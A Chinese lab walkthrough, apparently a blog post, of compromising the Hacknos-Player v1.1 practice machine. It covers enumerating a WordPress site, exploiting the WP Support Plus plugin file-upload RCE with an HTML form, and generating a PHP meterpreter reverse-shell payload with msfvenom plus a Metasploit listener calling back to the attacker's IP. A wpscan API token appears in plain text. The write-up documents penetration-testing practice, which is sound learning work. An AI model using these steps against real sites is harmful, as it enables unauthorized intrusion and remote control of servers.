Hacknos-Player V1.1靶机

1.查看mac地址并通过攻击机kali扫描主机IP地址

2.扫描主机IP地址

3.端口扫描

4.访问80端口

5.扫描目录

6.发现没有扫描出来有用信息在主页上发现

 7.拼接g@web

8.扫描二级目录

9.拼接wp-admin

10.通过插件发现是wordpress cms

11.使用wp-scan扫描站点用户和密码

12.在wp-loacl中发现了http://192.168.7.83/g@web/index.php/wp-json/wp/v2/users/?per_page=100&page=1

访问

 13.发现了它的用户名和密码尝试登录发现密码不对

14.使用wpscan对网站进行漏洞扫描

wpscan --url http://192.168.7.83/g@web -e vp --api-token NCpd6sIerdVHZ48sTMJ4RIeawnhpImnOrjaxXiXgIX0

15.发现到了远程代码执行漏洞WP Support Plus Responsive Ticket System < 8.0.8 – Remote Code Execution (RCE) | Plugin Vulnerabilities

 

16.构造poc并创建成html文件

<form method="post" enctype="multipart/form-data" action="http://192.168.7.83/g@web/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="wpsp_upload_attachment">
    Choose a file ending with .phtml:
    <input type="file" name="0">
    <input type="submit" value="Submit">
</form>

17.使用MSF生成PHP木马

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.7.75 LPORT=9999 x> 1.phtml 

18.将生成的木马上传到1.html

19.进入msf进行监听

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST  192.168.7.75
set LPORT  9999
exploit

 

20.上传的文件在

http://192.168.7.83/g@web/wp-content/uploads/wpsp/

21.访问文件成功反弹

  • 10
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值